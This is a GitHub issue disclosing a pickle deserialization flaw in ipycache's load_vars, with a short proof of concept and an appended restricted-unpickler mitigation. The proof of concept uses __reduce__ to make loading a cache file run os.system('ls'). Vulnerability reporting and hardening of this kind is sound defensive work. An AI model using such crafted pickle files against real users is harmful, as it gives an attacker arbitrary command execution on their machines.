rossant / ipycache

Defines a %%cache cell magic in the IPython notebook to cache results of long-lasting computations in a persistent pickle file
BSD 3-Clause "New" or "Revised" License
138 stars, 35 forks

ipycache.load_vars method is vulnerable #47

Open bigbigliang-malwarebenchmark opened 5 years ago

bigbigliang-malwarebenchmark commented 5 years ago

```python
import os
import pickle
import ipycache


class Test(object):

    def __init__(self):
        self.a = 1

    # pickle invokes the returned callable with the returned args on load
    def __reduce__(self):
        return (os.system, ('ls',))


tmpdaa = Test()
with open("a-file.pickle", 'wb') as f:
    pickle.dump(tmpdaa, f)

# loading the cache file executes the pickled os.system call
ipycache.load_vars('a-file.pickle', '')
```

Hi, the ipycache.load_vars function with evil data will cause command execution. If an attacker shares evil data on the internet, when a user loads it, it will cause command execution.
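The mitigation side of the report above, as an added example that is neither the reporter's code nor part of ipycache: an allow-listing `pickle.Unpickler` subclass that refuses to resolve any global outside a small set of `builtins` names, so a stream carrying a `__reduce__` callable fails at `find_class` before `REDUCE` can invoke it. `safe_load_vars(path, names)` is a hypothetical hardened stand-in for `ipycache.load_vars(path, vars)` and assumes the cache root is a dict of variable name to value; `Payload` is a constructed stand-in for the issue's `Test` class that calls `os.getcwd` instead of `os.system` so the effect is observable but harmless.

```python
import builtins
import io
import os
import pickle
import tempfile

# Names a cache file may reference. Plain containers and scalars need no
# GLOBAL lookups at all, so this set can stay tiny; extend it deliberately
# for the types a given notebook actually caches.
SAFE_BUILTINS = frozenset({
    "dict", "list", "tuple", "set", "frozenset",
    "str", "bytes", "int", "float", "complex", "bool",
})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every GLOBAL/STACK_GLOBAL lookup outside the
    allow-list. A stream naming os.system (or any other callable) is
    rejected here, before the REDUCE opcode could call it."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name} from cache data")


def restricted_loads(data: bytes):
    """Deserialize bytes with the allow-listing unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def unsafe_loads(data: bytes):
    """What an unrestricted pickle.load does: any callable named in the
    stream gets invoked. Kept only to contrast with restricted_loads."""
    return pickle.loads(data)


def pickle_is_blocked(data: bytes) -> bool:
    """True if the restricted unpickler refuses the stream."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


class Payload:
    """Constructed stand-in for the issue's Test class: __reduce__ makes
    pickle call a callable on load. os.getcwd replaces os.system so the
    call is observable (it returns a string) but harmless."""

    def __reduce__(self):
        return (os.getcwd, ())


def build_payload() -> bytes:
    """Constructed hostile cache-file contents."""
    return pickle.dumps(Payload())


def build_benign_cache() -> bytes:
    """Constructed benign cache: a dict of variable name -> value, assumed
    here to be the shape a %%cache file holds."""
    return pickle.dumps({"a": 1, "b": [1, 2, 3], "c": {"x": (4.0, "y")}})


def safe_load_vars(path: str, names):
    """Hypothetical hardened replacement for ipycache.load_vars(path, vars):
    read the file with the restricted unpickler, then return only the
    requested variables."""
    with open(path, "rb") as f:
        cache = RestrictedUnpickler(f).load()
    if not isinstance(cache, dict):
        raise pickle.UnpicklingError("cache root is not a dict")
    return {name: cache[name] for name in names}


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        hostile = os.path.join(tmp, "hostile.pkl")
        benign = os.path.join(tmp, "benign.pkl")
        with open(hostile, "wb") as f:
            f.write(build_payload())
        with open(benign, "wb") as f:
            f.write(build_benign_cache())
        print("benign:", safe_load_vars(benign, ["a", "b"]))
        try:
            safe_load_vars(hostile, ["a"])
        except pickle.UnpicklingError as exc:
            print("hostile:", exc)
```

The allow-list is the whole defence: anything a cache legitimately needs to reconstruct (array or dataframe types, for instance) must be added to it explicitly, and every addition should be a type whose constructor has no side effects. Where the cached values are simple, a format that cannot express code at all (JSON, or a column store) removes the problem rather than filtering it.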